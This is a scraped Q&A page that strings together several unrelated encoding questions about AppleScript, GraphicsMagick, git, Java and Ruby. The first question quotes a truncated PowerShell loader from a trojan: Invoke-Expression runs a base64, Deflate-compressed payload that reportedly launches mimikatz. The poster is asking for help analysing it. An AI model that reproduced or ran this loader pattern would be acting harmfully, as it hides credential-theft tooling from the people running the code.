I found a powershell script dropped by a trojan, I am not familiar with powershell. So I am just curious to see what it looks like inside but the script is encoded and I am not able to decode by basic means of base64 decoding.
I have tried these solutions:
Decoding base64 with powershell.
https://www.base64decode.org/
and a base64decoder application from a developer with an encoded.dec file but that fails aswell saying that something is not base64 character.
Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/
...499 word pages later ...
V6CuHdj+nTu/cfL/AA==')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
I am not sure what the output should be as I am not experienced with powershell scripts. I have run the script on a sandbox website by name of app.any.run and it opens "mimikatz" password extractor.
Related
I have come up with an AppleScript, to monitor my VPN connection from VPN Tracker. So far I got the code working, meaning it shows the correct state as text. I created two PNG files, which I converted into Base64 and would like to use those as the status output, instead of just having text. The reason for the Base64 conversion of the images is, so I can share the script with others, without needing to share the actual images as well and expect the user to put them somewhere on his Mac.
I am however unsure of how to decode those Base64 strings in AppleScript, so it shows the actual image in the end.
This is the code I have so far (with the text output)
set conn_state to "" as string
if application "VPN Tracker 365" is running then
tell application "VPN Tracker 365"
try
if name of groups contains "group_name" then
set conn_state to state of connection of group ("group_name") as string
if conn_state = "On" then
return "VPN active"
else
return "VPN inactive"
end if
end if
on error
return "An error occured"
end try
end tell
end if
I did do some research on the internet but could not find anything that would help me, solve this problem, or I was maybe not using the right search terms.
Any help would be much appreciated. Thanks in advance
"The reason for the Base64 conversion of the images is, so I can share the script with others, without needing to share the actual images as well and expect the user to put them somewhere on his Mac."
Consider taking a different approach. The following solution will enable the image(s) to be bundled within your Applescript and avoid having to Base64 encode/decode them:
Save your AppleScript as an "Application" format via the AppleScript Editor.
Locate your resultant application via the "Finder"
Click on it while pressing the ctrl key.
Via the context menu choose "Show Package Contents".
Copy your .png image(s) to the Contents/Resources folder.
Then in your code access the path to the image as follows:
# Get the pathname to where this script resides in the filesyetem.
set pathToMe to (path to me) as text
# Create the full pathname to the image
set pathToPng to pathToMe & "Contents:Resources:img.png" as alias
# Just a demo to illustrate that the image path can be accessed.
tell application "Preview" to open pathToPng
Note: This example code assumes you've copied an image named img.png to the Contents/Resources folder. It firstly obtains the path to wherever your app is located and assigns the images path to the pathToPng variable
Edit:
Or, as #user3439894 kindly mentioned in the comments, simply use the following code to obtain the path to the image(s) directly:
# Create the full pathname to the image
set pathToPng to path to resource "img.png"
# Just a demo to illustrate that the image path can be accessed.
tell application "Preview" to open pathToPng
Note: This utilizes path to resource to obtain the path of the image, and the aforementioned steps 1-3 are still necessary
I have found that GraphicsMagick is unable to process my files named in Chinese. I did the same test on ImageMagick but IM worked as expected.
I thought this might be a bug so I filed a bug report here: https://sourceforge.net/p/graphicsmagick/bugs/384/
Anyway, this is how to reproduce my situation:
Platform: Win10
Version: GraphicsMagick 1.3.20
Code: gm -identify 獅藝學會.jpg
This is the returned text from Command Prompt:
>gm -identify 獅藝學會.jpg
gm identify: Unable to open file (????.jpg) [Invalid argument].
gm identify: Request did not return an image.
Using IM worked:
identify 獅藝學會.jpg
ç?.è-?å-,æoƒ.jpg JPEG 3264x2448 3264x2448+0+0 8-bit sRGB 2.691MB 0.016u 0:00.004
Although the text returned is scrambled, but converting the file to a .png still maintained the same filename apart from the different extensions of course.
What happened
I found this problem by using the gm node.js library batch processing my images, the source of the call is made from a UTF-8 webpage, so I assume the filename is passed as Unicode encoding.
I found no documentation related to this problem, although the documentation states that there was a -encoding option, it cannot be sent as parameter on Windows as it does not recognize it and I cannot find relevant solutions on Google.
Please help, is there any easy way around this problem, while keeping the exact filename?
In case someone uses the C api.
(You can only give (char *)-type filenames. And UTF-8 encoding does not work, if using GraphicsMagick on Windows.)
You could do the following:
Open the file for input (or output) yourself (use fopen(), _wfopen() etc).
Then set the filehandle within the ImageInfo structure for reading and Image structure for writing respectively (instead of setting the filename).
To have GraphicsMagick generate the right output file format, set magick within the Image structure.
f.e.:
//Reading
imageInfo->file=_wfopen(input_filename,L"rb"); //ImageInfo *imageInfo;
ReadImage(imageInfo,exception);
//Writing
image->file=_wfopen(output_filename,L"wb"); //Image *image;
strcpy(image->magick,"PNG");
WriteImage(imageInfo,image);
GraphicsMagick automatically closes the file after writing/reading.
I have the same problem using GM in C++. UTF-8 filenames are not supported under Windows (not even in the API!).
My workaround is to get the short path name (8.3), you can do that both using command line and Win32. However this doesn't work 100% - and if you want to save a file you have to create an empty one first to be able to get the short name.
I'm trying to build web interface for GIT on Node.js.
Currently I have one problem: wrong Unicode encoding while 'git commit'. Commit message are shown in gibberish in log. And I have no clue on which step in which way I need to correct.
At this point I have:
1) UTF-8 encoded HTML page for interface;
2) Node.js child_process.spawn() to execute git commands;
3) ["-C",repo.path,"commit","-m",post.msg] as an argument list to pass to git;
When I execute the same command from git shell (Under Windows if it matters) - everything is fine.
Any suggestions?
Thanks in advance!
Update
I guess I won't have this question answered, but still add one detail:
it feels like somewhere message is converted from UTF8 to ISO 8859-1
Update2
Looks like 8859-1 - is my default CMD.exe (who proceed my commands) encoding... still have no idea on what to do with it.
The cause of problem was not about git, cmd or node.js. It was my stupid mistake.
On client I wrapped data into encodeURIComponent before send. On server unwrapped it with unescape. It took too much time to notice it.
Now, after I replaced unescape by decodeURIComponent, it works perfectly well.
I am curling a website and writing it to .json file; this file is input to my java code which parses it using json library and the necessary data is written back in a CSV file which i later use to store it in a database.
As you know data coming from a website can be in different formats so i make sure that i read and write in UTF-8 format, still i get wrong output.
For example, Østerriksk becomes �sterriksk.
I am doing all this in Linux. I think there is some encoding problem because this same code runs fine in Windows but not in Unix/Linux.
I am quite sure my java code is proper but i am not able to find out what I'm doing wrong.
You're reading the data as ISO 8859-1 but the file is actually UTF-8. I think there's an argument (or setting) to the file reader that should solve that.
Also: curl isn't going to care about the encodings. It's really something in your Java code that's wrong.
What kind of IDE are you using, for example this can happen if you are using Eclipse IDE, and not set your default encoding to utf-8 in properties.
I'm trying to use Twitter widget in a site which server is inside my corporation, hence, behind its proxy.
I can't use directly the code they provide, since I can't reach the source address.
<script charset="utf-8" src="http://widgets.twimg.com/j/2/widget.js"></script>
I was wondering if I could make a local copy of the js so I could avoid this problem, but, when I did so I get:
ActionView::WrongEncodingError in Home#index
Your template was not saved as valid UTF-8. Please either specify UTF-8 as the encoding for your template in your text editor, or mark the template with its encoding by inserting the following as the first line of the template:
# encoding: <name of correct encoding>.
But the encoding its already set.
I'm really really newby with this stuff.
Please help.
The error you get is because ruby needs an explicit encoding to parse correctly a non latin-1 file.
In each ruby file that has utf-8 characters you need a first line like the example:
# encoding: UTF-8
As for the main problem in your question, you can try, but probably communication with twitter is blocked.
You should talk to your system administrator to try to get access to twitter for your app.